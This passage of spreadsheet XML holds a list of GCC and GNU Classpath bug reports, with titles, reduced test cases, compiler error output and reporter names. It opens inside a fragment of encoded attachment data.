 M`(U)!QJE%6Z/%`@#Q`R%P`^$$`$``(M$)!R-!(#!X`*)10&lt;B@Z`^2MT
 M!8#Y+74.BXT\`0``A&lt;E]`O?9`\$][`D``'X'N.P)``#KH/X%'T%N!0```)
 M10&lt;B\OWV(F#H````.A3X___Z@```#_@9U![X!````ZPV#[@?WWAOV@^8&amp;
 M@\8BU0D.(V%V`$``%!34HU)!SH_O__XN%0`$``('F__\```O&amp;B\N)@Z0`
 M``#H!./__^MLBTPD.(M$</t>
  </si>
  <si>
    <t>lovematch</t>
  </si>
  <si>
    <t>GCC-21455</t>
  </si>
  <si>
    <t>[4.0/4.1 Regression] type 'X' is not a base type for type 'X' in pointer to member conversion</t>
  </si>
  <si>
    <t>testcase.ii:20253: error: type 'XMLFile' is not a base type for type 'XMLFile'  
testcase.ii:20253: error:    in pointer to member conversion  
I think it's a reject of valid code. 
# gcc-4.0.1-20050507.</t>
  </si>
  <si>
    <t>GCC-33099</t>
  </si>
  <si>
    <t>[4.2 Regression] Scalar evolutions confusing VRP with pointer values that wrap around</t>
  </si>
  <si>
    <t>The following test case is miscompiled with GCC 4.2:
extern void abort (void)
volatile int N = 5
void foo (void)
{
  int i
  char *p value[10]
  value[0] = 0x42
  for (i = 0 i &lt; N i++)
    if (i &gt; 0)
      {
        p = (char *)i - 1
        *(value + (int) p) = (char) i
      }
  if (value[0] != 1)
    abort ()
}
main()
{
  foo ()
  return 0
}
$ gcc --version
gcc (GCC) 4.2.2 20070816 (prerelease)
Copyright (C) 2007 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
$ gcc -O2 -o a a.c
$ ./a
Aborted (core dumped)
This was originally a C++ program which I converted into this C snippet from GIMPLE.  I believe it's valid C but I am not actually sure.  The original C++ code *is* valid though.
The problem here starts in tree-vrp.c:adjust_range_with_scev() when we ask for the scalar evolution of p_8 in the loop
:
  i_24 = ASSERT_EXPR 
  if (i_24 &gt; 0) goto  else goto 
[ ... ]
:
  i_4 = ASSERT_EXPR  0&gt;
  i.0_7 = (char *) i_4
  p_8 = i.0_7 - 1B
[...]
:
  i_11 = i_24 + 1
  # i_1 = PHI 
:
  if (i_1  else goto 
The call to analyze_scalar_evolution(loop p_8) returns the chrec {-1B + 1B} which is more or less understandable because the initial value i.0_7 can be traced all the way back to the start of the loop to 0.
However:
1- SCEV has not realized that there is an ASSERT_EXPR in the path.  The initial value of i.0_7 is actually 1 not 0.
2- When VRP sees the chrec {-1B + 1B} it asks whether it may wrap.  Since we assumes that pointers never wrap scev_probably_wraps_p returns false.  Which is understandable I guess but in this case we get burnt by the logic that follows in adjust_range_with_scev:
  * Since the range we have is VARYING we take the initial value of the given chrec and set it as the min value for the range.  So the minimum value for the new range is set to -1B.
  * Since the scalar evolution goes forward we set the maximum value to the max value for the type (upper_bound_in_type).  Which also happens to be -1B.
  * So we end up with the range [-1B -1B] which we later propagate into the pointer dereference causing the failure.
This problem does not happen in mainline because of the PTR_PLUS_EXPR cleanup. Pointer arithmetic uses unsigned types and all this is avoided.
I think that the core problem is that we are tripping over the fact that while we don't consider pointers to wrap the instantiation of the chrec is giving wrapped-around pointer values.  This confuses VRP.
So far I see the following options for fixing this:
1- Teach SCEV that subtracting pointer values from 0 yields an unkown
chrec.  Similarly adding to upper_bound_in_type will yield an unkown
chrec.  What's the wording in the standard wrt pointer arithmetic?  Is
the following undefined implementation defined or valid?
	char *p = 0
	--p
	*p = 'x'
2- Teach SCEV about ASSERT_EXPRs when instantiating chrecs.  Would
benefit both mainline and 4.2.  May hide other bugs that occur when
there are no assertions around. But that's unlikely.
3- Tell VRP to refuse to do anything with pointer chrecs that have a constant initial value.  This may prove suboptimal in some cases where we could've gotten a good range but they should be few and far between.
4- In mainline the representation of pointer arithmetic has been
cleaned up considerably with the PTR_PLUS_EXPR patches.  Bringing those
in to 4.2 is IMO out of the question because of the sheer invasiveness.
But if the problem was widespread enough maybe we could consider it.  I
don't think it is though.</t>
  </si>
  <si>
    <t>GCC-81929</t>
  </si>
  <si>
    <t>[7/8 Regression] exponential slowdown in undefined behavior sanitizer for streaming</t>
  </si>
  <si>
    <t>Created attachment 42028
A reproduction of the issue described
I've attached a reproduction. The trigger for the behavior we identified is:
 * To stream a number of ints (or other numeric types) into a std::ostringstream
 * To call .str() on that std::ostringstream
 * To do all of the above in a single expression
 * Build with -fsanitize=undefined
It seems that all the above conditions are necessary - the problem vanishes if you:
 * Split the same logic into multiple logical lines of code
 * Call some member function other than .str() (like .rdbuf())
 * Stream string literals instead of numeric types
 * Compile without -fsanitize=undefined
The behavior we see is a compile-time that seems to grow as roughly 4^n where n is the number of ints being streamed in. On my box
10 numbers =   0.671s
11 numbers =   1.608s
12 numbers =   5.356s
13 numbers =  20.250s
14 numbers =  80.163s
15 numbers = 318.994s
Salient output from perf record / perf report:
# Overhead  Command       Shared Object                      Symbol
# ........  ............  .................................  ........................................................................................................................................
#
    59.95%  cc1plus       cc1plus                            [.] walk_tree_1(tree_node** tree_node* (*)(tree_node** int* void*) void* hash_set &gt;* tree_node* (*)(tree_node** int* tree_node* (*)(tree_node** int* void*) void* hash_set &gt;*))
    23.54%  cc1plus       cc1plus                            [.] replace_placeholders_r(tree_node** int* void*)
    14.87%  cc1plus       cc1plus                            [.] cp_walk_subtrees(tree_node** int* tree_node* (*)(tree_node** int* void*) void* hash_set &gt;*)
     0.07%  cc1plus       cc1plus                            [.] push_to_top_level()
     0.06%  cc1plus       [kernel.kallsyms]                  [k] clear_page_c_e
     0.04%  cc1plus       cc1plus                            [.] lookup_name_real(tree_node* int int bool int int)</t>
  </si>
  <si>
    <t>patrick.a.moran</t>
  </si>
  <si>
    <t>GCC-16433</t>
  </si>
  <si>
    <t>wrong hexadecimal constant warning</t>
  </si>
  <si>
    <t>The following code derived from g77.dg/pr5473.f gives an incorrect warning.
I think it is standard Fortran 77/90/95.
      real x
      double precision dx
      x = 2.0
      dx = x
      end
/usr/local/obj/gcc-f/gcc/testsuite/../gfortran -B/usr/local/obj/gcc-
f/gcc/testsuite/../ /usr/local/src/gcc/gcc/testsuite/gfortran.dg/pr5473a.f -
O0 -pedantic-errors -S -o pr5473a.s
 In file /usr/local/src/gcc/gcc/testsuite/gfortran.dg/pr5473a.f:4
      dx = x
           1
Warning: Extension: Hexadecimal constant at (1) uses non-standard syntax.</t>
  </si>
  <si>
    <t>GCC-7228</t>
  </si>
  <si>
    <t>ICE when using member template and template function</t>
  </si>
  <si>
    <t>The following code crushes gcc 3.1.1 and 3.0.4 (but not 2.95.4).
-----------------------
#include
template
struct S {
    enum {I = N}
    template
    struct rebind {
        typedef S Type
    }
}
template
void f(S&amp; s T&amp; t)
{
    typename S::rebind::Type ss
    std::cout &lt;&lt; ss.I &lt;&lt; std::endl 
}
int main(){ 
    S s 
    S t 
    f(st) 
}
------------------
$ g++ test.cc
test.cc: In function `void f(S&amp; T&amp;) [with S = S T = S]':
test.cc:21:   instantiated from here
test.cc:14: internal error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Also fails without iostream:
template
struct S {
  enum {I = N}
  template
  struct rebind {
    typedef S Type
  }
}
template
int f(S&amp; s T&amp; t)
{
  typename S::rebind::Type ss
  return ss.I
}
int main(){ 
  S s 
  S t 
  f(st) 
}
The SEGV occurs in cp/decl.c:check_initializer.  The DECL
type is TYPENAME_TYPE which matches IS_AGGR_TYPE but it
does not have a TYPE_LANG_SPECIFIC node attached so
LANG_TYPE_CLASS_CHECK dereferences NULL.
Release:
3.1.1pr and 3.0.4
How-To-Repeat:
Compile the above.</t>
  </si>
  <si>
    <t>ndry</t>
  </si>
  <si>
    <t>GCC-34079</t>
  </si>
  <si>
    <t>Bind(C): Character argument/return value problems</t>
  </si>
  <si>
    <t>Using STDCALL not the callee but the called procedure pops the arguments from the stack. The problem is that gfortran currently also for BIND(C) passes the string lengths as arguments.
See also:
http://groups.google.com/group/comp.lang.fortran/browse_thread/thread/19d77dfc75f8be58</t>
  </si>
  <si>
    <t>GCC-11943</t>
  </si>
  <si>
    <t>Accepts invalid declaration int x[2 3] in C99 mode</t>
  </si>
  <si>
    <t>In C99 the brackets must contain an assignment-expression however 2 3 is
not an assignment-expression. I don't have the C89 standard but I guess it's
similar.
It would be nice to reject this code because it's a totally useless language
extension and it might confuse newbies trying to declare two-dimensional arrays.</t>
  </si>
  <si>
    <t>GCC-8480</t>
  </si>
  <si>
    <t>reload ICEs for LAPACK code on powerpc64-linux</t>
  </si>
  <si>
    <t>The three test cases all ICE with gcc version 3.3 20021104
(experimental) for powerpc64-linux and for GCC 3.2.  They
are all derived from the LAPACK file TESTING/LIN/sdrvgt.f
and are included in the same PR because all three ICEs
might result from the same root cause if not they can be
split into separate PRs later.
Compiling lapack_bug_O1.f with -O1 gives:
lapack_bug_O1.f: In subroutine `sdrvgt':
lapack_bug_O1.f:46: internal compiler error: in gen_add2_insn at optabs.c:4196
Compiling lapack_bug_O2_1.f with -O2 gives:
lapack_bug_O2_1.f: In subroutine `sdrvgt':
lapack_bug_O2_1.f:100: error: insn does not satisfy its constraints:
(insn 750 749 676 9 (nil) (set (reg/f:DI 59 f27 [244])
        (plus:DI (reg/f:DI 59 f27 [244])
            (const_int 288 [0x120]))) 226 {*adddi3_internal1} (nil)
    (expr_list:REG_EQUIV (plus:DI (reg/f:DI 1 r1)
            (const_int 288 [0x120]))
   lapack_bug_O2_1.f:100: internal compiler error: in reload_cse_simplify_operands at reload1.c:8331
Compiling lapack_bug_O2_2.f with -O2 gives:
lapack_bug_O2_2.f: In subroutine `sdrvgt':
lapack_bug_O2_2.f:78: internal compiler error: in reload at reload1.c:1109     (nil)))
Release:
3.3 20021104 (experimental) and 3.2
Environment:
powerpc64-linux
How-To-Repeat:
See description.</t>
  </si>
  <si>
    <t>GCC-64748</t>
  </si>
  <si>
    <t>OpenACC: is not a variable error with deviceptr()</t>
  </si>
  <si>
    <t>From https://github.com/jefflarkin/openacc-interoperability/
The following program seems to compile with PGI's and Cray's compilers. With GCC it shows the odd:
foo.c:3:30: error: â€˜arrâ€™ is not a variable
 #pragma acc kernels deviceptr(arr)
                              ^
void set(int n float val float * restrict arr)
{
#pragma acc kernels deviceptr(arr)
  {
    for(int i=0 i&lt;n i++)
    {
      arr[i] = val
    }
  }
}</t>
  </si>
  <si>
    <t>GCC-58880</t>
  </si>
  <si>
    <t>[4.9/4.10 Regression] [OOP] ICE on valid with FINAL function and type extension</t>
  </si>
  <si>
    <t>The following causes an ICE using gfortran 4.9.0 (r204039):
module gn
  type sl
     integer allocatable dimension(:) :: lv
   contains
     final :: sld
  end type sl
  type :: nde
     type(sl) :: r
  end type nde
contains
  subroutine ndm(s)
    type(nde) intent(inout) :: s
    type(nde)                :: i    
    i=s
  end subroutine ndm
  subroutine sld(s)
    implicit none
    type(sl) intent(inout) :: s
    return
  end subroutine sld
end module gn
$ gfortran -v
Using built-in specs.
COLLECT_GCC=gfortran
COLLECT_LTO_WRAPPER=/home/abenson/Galacticus/Tools/libexec/gcc/x86_64-unknown-linux-gnu/4.9.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-trunk/configure --prefix=/home/abenson/Galacticus/Tools --enable-languages=cc++fortran --disable-multilib --with-gmp=/home/abenson/Galacticus/Tools
Thread model: posix
gcc version 4.9.0 20131024 (experimental) (GCC) 
$ gfortran -c tmp1.F90 -o tmp1.o
tmp1.F90: In function 'ndm':
tmp1.F90:14:0: internal compiler error: in fold_convert_loc at fold-const.c:1970
     i=s
 ^
0x78774d fold_convert_loc(unsigned int tree_node* tree_node*)
        ../../gcc-trunk/gcc/fold-const.c:1969
0x59d0c8 gfc_conv_descriptor_data_set(stmtblock_t* tree_node* tree_node*)
        ../../gcc-trunk/gcc/fortran/trans-array.c:178
0x5c4be8 gfc_conv_scalar_to_descriptor(gfc_se* tree_node* symbol_attribute)
        ../../gcc-trunk/gcc/fortran/trans-expr.c:72
0x599421 gfc_add_comp_finalizer_call(stmtblock_t* tree_node* gfc_component* bool)
        ../../gcc-trunk/gcc/fortran/trans.c:1011
0x5a7689 structure_alloc_comps
        ../../gcc-trunk/gcc/fortran/trans-array.c:7609
0x5c863b gfc_trans_scalar_assign(gfc_se* gfc_se* gfc_typespec bool bool bool)
        ../../gcc-trunk/gcc/fortran/trans-expr.c:6946
0x5d35a2 gfc_trans_assignment_1
        ../../gcc-trunk/gcc/fortran/trans-expr.c:7990
0x598f11 trans_code
        ../../gcc-trunk/gcc/fortran/trans.c:1622
0x5c1b5e gfc_generate_function_code(gfc_namespace*)
        ../../gcc-trunk/gcc/fortran/trans-decl.c:5528
0x59a6e1 gfc_generate_module_code(gfc_namespace*)
        ../../gcc-trunk/gcc/fortran/trans.c:1955
0x5583df translate_all_program_units
        ../../gcc-trunk/gcc/fortran/parse.c:4496
0x5583df gfc_parse_file()
        ../../gcc-trunk/gcc/fortran/parse.c:4706
0x594955 gfc_be_parse_file
        ../../gcc-trunk/gcc/fortran/f95-lang.c:189
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Removing any of:
     integer allocatable dimension(:) :: lv
     final :: sld
     i=s
results in a successful compile.</t>
  </si>
  <si>
    <t>GCC-30518</t>
  </si>
  <si>
    <t>error from system header file</t>
  </si>
  <si>
    <t>After using the patch of PR30511 gcc-4.3-20070119 failed to build
on OSX 10.3.9 with:
...
/sw/src/fink.build/gcc4-4.3.0-20070120/darwin_objdir/./gcc/xgcc -B/sw/src/fink.build/gcc4-4.3.0-20070120/darwin_objdir/./gcc/ -B/sw/lib/gcc4/powerpc-apple-darwin7/bin/ -B/sw/lib/gcc4/powerpc-apple-darwin7/lib/ -isystem /sw/lib/gcc4/powerpc-apple-darwin7/include -isystem /sw/lib/gcc4/powerpc-apple-darwin7/sys-include -DHAVE_CONFIG_H -I. -I../../../gcc-4.3-20070120/libgfortran -I. -iquote../../../gcc-4.3-20070120/libgfortran/io -I../../../gcc-4.3-20070120/libgfortran/../gcc -I../../../gcc-4.3-20070120/libgfortran/../gcc/config -I../.././gcc -D_GNU_SOURCE -std=gnu99 -Wall -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition -Wextra -Wwrite-strings -O2 -g -O2 -MT error.lo -MD -MP -MF .deps/error.Tpo -c ../../../gcc-4.3-20070120/libgfortran/runtime/error.c  -fno-common -DPIC -o .libs/error.o
In file included from ../../../gcc-4.3-20070120/libgfortran/runtime/error.c:52:
/usr/include/sys/resource.h:81: error: field 'ru_utime' has incomplete type
/usr/include/sys/resource.h:82: error: field 'ru_stime' has incomplete type
Any idea about where it comes from and how to fix it?
Following the FX Coudert's advice I attach the preprocessed source file.</t>
  </si>
  <si>
    <t>GCC-55067</t>
  </si>
  <si>
    <t>[4.8 Regression] AIX bootstrap failure due to lra.c loc_t</t>
  </si>
  <si>
    <t>The merge of LRA causes a bootstrap failure on AIX due to use of the typedef loc_t.  This is similar to the bug for tree-diagnostic.c reported in PR 50874.  Please change the typedef name.</t>
  </si>
  <si>
    <t>GCC-16224</t>
  </si>
  <si>
    <t>[3.3/3.4/4.0 Regression] internal compiler error: in write_unscoped_name (template/namespace)</t>
  </si>
  <si>
    <t>I am using
    gcc (GCC) 3.3.1 (Mandrake Linux 9.2 3.3.1-2mdk)
I've recreated code that produces the conditions I had in my main project. I
don't know if I can reduce the size anymore.
The error:
tpl_mangle.cc: In function `int main()':
tpl_mangle.cc:30: internal compiler error: in write_unscoped_name at
cp/mangle.c:786
Attached is code that produces the error.
I've found Bug 9304 and 10428 which both produce the same error but do not
involve templates and namespaces. 
(Will attach code)</t>
  </si>
  <si>
    <t>GCC-7923</t>
  </si>
  <si>
    <t>g++ - inline cast of double to long returns incorrect value</t>
  </si>
  <si>
    <t>In both of these environments the following code should print the same value all three times. However the third value is incorrectly printed as 256.
#include 
#include 
int main()
{
    double maxLinearValue = 65535.0
    double ian = maxLinearValue * pow(double(1.0/ 255.0) 1.0)
    long correctLongValue = long(ian)
    long incorrectLongValue = long(maxLinearValue * pow(1.0/ 255.0 1.0))
    std::cout &lt;&lt; double:  &lt;&lt; ian &lt;&lt; std::endl
    std::cout &lt;&lt; correct:  &lt;&lt; correctLongValue &lt;&lt; std::endl
    std::cout &lt;&lt; incorrect:  &lt;&lt; incorrectLongValue &lt;&lt; std::endl
    return 0
}
Release:
gcc 3.2 20020818 gcc 2.95
Environment:
Cygwin and SuSe Linux 7.2 on Intel</t>
  </si>
  <si>
    <t>ian.nowland</t>
  </si>
  <si>
    <t>GCC-8228</t>
  </si>
  <si>
    <t>ICE on HUGE_VAL in template code</t>
  </si>
  <si>
    <t>The program below causes an ICE with gcc 3.2:
$ cat t.cpp g++ --version g++ t.cpp
#include 
template 
void foo ()
{
    if (HUGE_VAL == 0.0L)
}
int main ()
{
    foo()
}
g++ (GCC) 3.2
Copyright (C) 2002 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
t.cpp: In function `void foo() [with T = int]':
t.cpp:11:   instantiated from here
t.cpp:6: internal error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed with this version of glibc foo contains this:
template 
void foo ()
{
    if ((__extension__ ((union { unsigned char __c[8] double __d }) { __c: { 0
 0 0 0 0 0 0xf0 0x7f } }).__d) == 0.0L)
}
Release:
3.2
Environment:
Linux glibc 2.1</t>
  </si>
  <si>
    <t>GCC-60973</t>
  </si>
  <si>
    <t>Invalid propagation of a tail call in devirt pass</t>
  </si>
  <si>
    <t>This problem can be illustrated with a target that doesn't define TARGET_ASM_CAN_OUTPUT_MI_THUNK such as h8300-elf.
Compiling g++.dg/ipa/imm-devirt-2.C using -O2 with a crosscompiler to h8300-elf we get in _.037t.inline_param2:
virtual int C::_ZThn10_N1C3fooEi(int) (struct C * const this int i)
{
  int retval___0
  :
  this_2 = this_1(D) + 65526
  retval___0_5 = C::foo (this_2 i_4(D)) [tail call]
  return retval___0_5
}
and
int main(int char**) (int argc char * * argv)
{
  struct C c
  int _3
  int _6
  :
  C::C (
  _3 = get_input ()
  _6 = C::_ZThn10_N1C3fooEi (
  if (_6 != 4)
    goto 
  else
    goto 
  :
  abort ()
  :
  c ={v} {CLOBBER}
  return 0
}
However copyrename2 pass propagates tail call annotation to the call site resulting in _.054t.copyrename2:
int main(int char**) (int argc char * * argv)
{
  int retval___0
  int D.2161
  struct C * const this
  struct C c
  int _3
  int _6
  :
  C::C (
  _3 = get_input ()
  this_7 = 
  retval___0_8 = C::foo (this_7 _3) [tail call]          &lt;&lt;&lt; here!
  _9 = retval___0_8
  _6 = _9
  if (_6 != 4)
    goto 
  else
    goto 
  :
  abort ()
  :
  c ={v} {CLOBBER}
  return 0
}
On a target that support sibcalls RTL expansion ends after tail call so _.170r.expand ends with:
...
(call_insn/u/j 15 14 16 2 (set (reg:SI 3 r3)
        (call (mem:SI (symbol_ref:SI (_ZN1C3fooEi) [flags 0x3]  ) [0 foo S4 A32])
            (const_int 0 [0]))) -1
     (expr_list:REG_EH_REGION (const_int 0 [0])
        (nil))
    (expr_list:SI (use (reg:SI 4 r4))
        (expr_list:SI (use (reg:SI 3 r3))
            (nil))))
  succ:       EXIT [100.0%]  (ABNORMALSIBCALL)
(barrier 16 15 0)
The tail call is valid only in _ZThn16_N1C3fooEi (a.k.a non-virtual thunk to C::foo(int)) and should not be propagated as a tail call to its call site.</t>
  </si>
  <si>
    <t>GCC-83681</t>
  </si>
  <si>
    <t>epiphany: config/epiphany/epiphany.h:883:8: error: unknown type name 'rtl_opt_pass'</t>
  </si>
  <si>
    <t>I cannot build an epiphany-rtems5 Ada compiler:
/run/user/10351/b-gcc-epiphany/./gcc/xgcc -B/run/user/10351/b-gcc-epiphany/./gcc/ -nostdinc -B/run/user/10351/b-gcc-epiphany/epiphany-rtems5/newlib/ -isystem /run/user/10351/b-gcc-epiphany/epiphany-rtems5/newlib/targ-include -isystem /home/sh/src/gcc/newlib/libc/include -B/home/sh/install/epiphany-rtems5/bin/ -B/home/sh/install/epiphany-rtems5/lib/ -isystem /home/sh/install/epiphany-rtems5/include -isystem /home/sh/install/epiphany-rtems5/sys-include    -c -DCROSS_DIRECTORY_STRUCTURE -DIN_GCC  -W -Wall -g -O2 -g -O2 -fexceptions -DIN_RTS -DHAVE_GETIPINFO    \
        -iquote /home/sh/src/gcc/gcc \
         -iquote . -iquote .. -iquote ../.. -iquote /home/sh/src/gcc/gcc/ada -iquote /home/sh/src/gcc/gcc -I/home/sh/src/gcc/include  \
        targext.c -o targext.o
In file included from ../../tm.h:21
                 from targext.c:46:
/home/sh/src/gcc/gcc/config/epiphany/epiphany.h:883:8: error: unknown type name 'rtl_opt_pass'
 extern rtl_opt_pass *make_pass_mode_switch_use (gcc::context *ctxt)
        ^~~~~~~~~~~~
/home/sh/src/gcc/gcc/config/epiphany/epiphany.h:883:52: error: expected ')' before ':' token
 extern rtl_opt_pass *make_pass_mode_switch_use (gcc::context *ctxt)
                                                    ^
                                                    )
/home/sh/src/gcc/gcc/config/epiphany/epiphany.h:884:8: error: unknown type name 'rtl_opt_pass'
 extern rtl_opt_pass *make_pass_resolve_sw_modes (gcc::context *ctxt)
        ^~~~~~~~~~~~
/home/sh/src/gcc/gcc/config/epiphany/epiphany.h:884:53: error: expected ')' before ':' token
 extern rtl_opt_pass *make_pass_resolve_sw_modes (gcc::context *ctxt)
                                                     ^
                                                     )
In file included from ../../tm.h:23
                 from targext.c:46:
/home/sh/src/gcc/gcc/config/elfos.h:201: warning: READONLY_DATA_SECTION_ASM_OP redefined
 #define READONLY_DATA_SECTION_ASM_OP \t.section\t.rodata
In file included from ../../tm.h:21
                 from targext.c:46:
/home/sh/src/gcc/gcc/config/epiphany/epiphany.h:671: note: this is the location of the previous definition
 #define READONLY_DATA_SECTION_ASM_OP \t.section .rodata</t>
  </si>
  <si>
    <t>GCC-46602</t>
  </si>
  <si>
    <t>[4.6 Regression] gcc.dg/pr42245-2.c ICE on ia64</t>
  </si>
  <si>
    <t>Introduced with r166697 my fix for PR 46204.  I'm testing the following patch.
Index: gcc/sel-sched-ir.c
===================================================================
--- gcc/sel-sched-ir.c	(revision 167024)
+++ gcc/sel-sched-ir.c	(working copy)
@@ -365010 +36506 @@
       remove_empty_bb (bb true)
     }
-#ifdef ENABLE_CHECKING
-  verify_backedges ()
-#endif
-
   return true
 }
@@ -37356 +373111 @@
       if (recompute_toporder_p)
 	sel_recompute_toporder ()
     }
+
+#ifdef ENABLE_CHECKING
+  verify_backedges ()
+#endif
+
   return changed
 }</t>
  </si>
  <si>
    <t>GCC-39424</t>
  </si>
  <si>
    <t>MinGW doesn't seem to work if main disk is not C:\</t>
  </si>
  <si>
    <t>On this computer the main disk is labeled H:\ and GCC won't so much as print its version. It repeatedly causes crss to throw a No Disk error which doesn't accept cancel as an answer. Can't really isolate problem don't have access to any other computers without C:\ as main drive and since it won't even give me a version number...
Thanks and best of luck.</t>
  </si>
  <si>
    <t>JoshV</t>
  </si>
  <si>
    <t>GCC-46937</t>
  </si>
  <si>
    <t>[4.6 Regression] gfortran.dg/pointer_intent_1.f90 FAILs with -fno-inline</t>
  </si>
  <si>
    <t>Created attachment 22752
reduced testcase
Output - original testcase:
$ gfortran -O -fno-inline -ftree-pre pointer_intent_1.f90
$ ./a.out 
Aborted
Output - reduced testcase:
$ gfortran -O -fno-inline testcase.f90
$ ./a.out 
Aborted
Tested revisions (reduced testcase):
r167770 - fail
r165699 - fail
r161659 - OK
4.5 r166509 - OK</t>
  </si>
  <si>
    <t>CLASSPATH-24618</t>
  </si>
  <si>
    <t>equals method for collections</t>
  </si>
  <si>
    <t>In many cases Sun does not use a 100% correct method to determine when one object matches another. In the case where an object is not equal to itself (as defined in its equals method) the implementation will match it anyways.
E.g.
import java.util.*
public class Test
{
   public static void main(String[] args)
   {
      HashMap map = new HashMap()
      Test test = new Test()
      map.put(test1)
      System.out.println(map.get(test))
   }
   public boolean equals(Object o)
   {
      return false
   }
}
This will return 1.
The package private equals method in classpath (in AbstractMap):
static final boolean equals(Object o1 Object o2)
  {
    return o1 == null ? o2 == null : o1.equals(o2)
  }
Will not match an object with its self if it is not equal to itself.</t>
  </si>
  <si>
    <t>GCC-8114</t>
  </si>
  <si>
    <t>Modulair var is not checked</t>
  </si>
  <si>
    <t>when you declare an unsigned char global.
and check it in your main loop the code is wrong.
reg 24 is and with reg 24.
and jmp -2 which makes an never ending loop.
but if you make an global pointer to an local var and check this one the code is ok.
Release:
2002-06-25_FREAKS.exe
Environment:
win2000
How-To-Repeat:
See Zip</t>
  </si>
  <si>
    <t>j.westgeest</t>
  </si>
  <si>
    <t>GCC-46947</t>
  </si>
  <si>
    <t>Segmentation Fault compiling templates with function pointers</t>
  </si>
  <si>
    <t>Created attachment 22756
Files needed to reproduce and report the bug.
When the source in the attached archive is compiled with:
    g++ -save-temps main.cpp
the output is:
    main.cpp: In member function â€˜FTemplate &gt;
    FTemplate::operator|(const FTemplate&amp;) const [with int (* FuncB)() = _Nullary int (* FuncA)() = _Nullary]â€™:
    main.cpp:11: internal compiler error: Segmentation fault
    Please submit a full bug report
    with preprocessed source if appropriate.
    See  for instructions.
Admittedly this problem might be Apple specific but it is probably worth checking as I understand it is the same code base and I'm not sure how forthcoming Apple is with bugs.
g++ -v:
    Using built-in specs.
    Target: i686-apple-darwin10
    Configured with: /var/tmp/gcc/gcc-5664~105/src/configure --disable-checking --enable-werror --prefix=/usr
    --mandir=/share/man --enable-languages=cobjcc++obj-c++ --program-transform-name=/^[cg][^.-]*$/s/$/-4.2/
    --with-slibdir=/usr/lib --build=i686-apple-darwin10 --program-prefix=i686-apple-darwin10-    --host=x86_64-apple-darwin10
    --target=i686-apple-darwin10 --with-gxx-include-dir=/include/c++/4.2.1
    Thread model: posix
    gcc version 4.2.1 (Apple Inc. build 5664)</t>
  </si>
  <si>
    <t>cacoyi</t>
  </si>
  <si>
    <t>GCC-683</t>
  </si>
  <si>
    <t>wrong behaviour of (?:) with wchar_t</t>
  </si>
  <si>
    <t>When executing code like
wchar_t w1 w2
x=0
func (x ? w1: w2)
the result is always w1.
Release:
unknown
Environment:
Linux (kernel 2.2.*) RedHat 6.1 6.2
gcc: Standard 2.95.2  (and egcs 1.1.2)
How-To-Repeat:
simply compile the attached file with gcc and run it.</t>
  </si>
  <si>
    <t>wilhelm.nuesser</t>
  </si>
  <si>
    <t>GCC-53300</t>
  </si>
  <si>
    <t>[4.8 Regression] AIX bootstrap related to varpool patch</t>
  </si>
  <si>
    <t>The recent change to cgraph_remove_unreachable_nodes causes AIX bootstrap failure because TOC symbols are removed.
ld: 0711-317 ERROR: Undefined symbol: LC..0
ld: 0711-317 ERROR: Undefined symbol: LC..1
ld: 0711-317 ERROR: Undefined symbol: LC..2
ld: 0711-317 ERROR: Undefined symbol: LC..3
ld: 0711-317 ERROR: Undefined symbol: LC..4
These are emitted in output_toc(). I am not sure what dependency is missing to allow cgraph to believe the symbol is unused. Although both AIX and pLinux use TARGET_TOC this does not fail on Linux.</t>
  </si>
  <si>
    <t>GCC-20480</t>
  </si>
  <si>
    <t>libfortran: formatted write ES edit descriptor</t>
  </si>
  <si>
    <t>Hi
      write (*10) 0.0
 10   format (ES12.3)
      end
prints
   0.000E-01
instead of
   0.000E+00
as it should.
Cheers
-ha</t>
  </si>
  <si>
    <t>GCC-44831</t>
  </si>
  <si>
    <t>[4.6 Regression] internal compiler error: verify_stmts failed when compiling wine</t>
  </si>
  <si>
    <t>Howdy
This is a regression in gcc but I haven't yet bisected it. Hopefully there is enough information to fix it without bisecting.
gcc version used:
austin@midna:~/wine-git/dlls/netapi32$ gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/local/libexec/gcc/x86_64-unknown-linux-gnu/4.6.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ./configure : (reconfigured) ./configure : (reconfigured) ./configure
Thread model: posix
gcc version 4.6.0 20100705 (experimental) (GCC) 
when compiling wine it fails with:
austin@midna:~/wine-git/dlls/netapi32$ make
gcc -m32 -c -I. -I. -I../../include -I../../include  -D__WINESRC__ -D_SVRAPI_ -D_REENTRANT -fPIC -Wall -pipe -fno-strict-aliasing -Wdeclaration-after-statement -Wstrict-prototypes -Wtype-limits -Wwrite-strings -Wpointer-arith  -g -O2  -o nbcmdqueue.o nbcmdqueue.c
nbcmdqueue.c: In function â€˜NBCmdQueueFindNBCâ€™:
nbcmdqueue.c:92:14: error: Incompatible types in PHI argument 1
struct _NCB *
UCHAR
D.10020_19 = PHI 
nbcmdqueue.c:92:14: internal compiler error: verify_stmts failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make: *** [nbcmdqueue.o] Error 1
system is ubuntu lucid uname -a:
Linux midna 2.6.31-11-rt #154-Ubuntu SMP PREEMPT RT Wed Jun 9 13:40:34 UTC 2010 x86_64 GNU/Linux
expected behavior: wine compiles
actual behavior: internal compiler error
I'll attach the output of gcc -v -save-temps as well as the preprocessed source.</t>
  </si>
  <si>
    <t>austinenglish</t>
  </si>
  <si>
    <t>GCC-2054</t>
  </si>
  <si>
    <t>g++-3 rejects legal code accepted by g++-2.95.2 (functors)</t>
  </si>
  <si>
    <t xml:space="preserve">The source code ts.C is rejected by g++-3.0 20010221 but accepted by
g++-2.95.2. The file ts.C is a stripped-down version of the file
k8/thesaur.cc from the book Die C++ Standard Template Library by
Ulrich Breymann.
Release:
3.0 20010221 (prerelease)
Environment:
